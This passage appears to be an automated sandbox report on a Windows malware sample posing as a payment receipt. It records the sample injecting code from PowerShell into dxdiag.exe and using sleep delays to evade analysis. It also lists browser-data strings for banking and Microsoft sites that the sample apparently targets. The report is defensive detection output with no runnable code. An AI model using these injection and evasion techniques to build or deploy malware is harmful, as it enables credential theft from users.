Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\dxdiag.exe

API/Special instruction interceptor: Address: 4BB58D1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6924			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2576			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260

Thread sleep time: -3689348814741908s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\comprobante de pago.exe	Code function: 0_2_004064C1 FindFirstFileW,FindClose,	0_2_004064C1
Source: C:\Users\user\Desktop\comprobante de pago.exe	Code function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040596F
Source: C:\Users\user\Desktop\comprobante de pago.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: WebData.24.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: WebData.24.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: WebData.24.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: WebData.24.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: WebData.24.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: dxdiag.exe, 00000018.00000003.2448541231.00000000077CF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655p
Source: WebData.24.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: dxdiag.exe, 00000018.00000002.2503286760.0000000007707000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000018.00000002.2503286760.000000000775D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: WebData.24.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: WebData.24.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: WebData.24.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: WebData.24.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: WebData.24.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: WebData.24.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: WebData.24.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: WebData.24.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: WebData.24.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: WebData.24.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: WebData.24.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: WebData.24.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: WebData.24.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: WebData.24.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: WebData.24.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: dxdiag.exe, 00000018.00000003.2448541231.00000000077CF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,1169642`
Source: powershell.exe, 00000001.00000002.1851875810.0000000005B4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\
Source: WebData.24.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: WebData.24.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: WebData.24.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: WebData.24.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: ModuleAnalysisCache.1.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.1851875810.0000000005B4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\
Source: WebData.24.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: WebData.24.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: powershell.exe, 00000001.00000002.1851875810.0000000005B4D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\
Source: WebData.24.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: WebData.24.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: WebData.24.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: WebData.24.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\comprobante de pago.exe	API call chain: ExitProcess graph end node			graph_0-3229
Source: C:\Users\user\Desktop\comprobante de pago.exe	API call chain: ExitProcess graph end node			graph_0-3407

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\dxdiag.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\dxdiag.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 3000000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
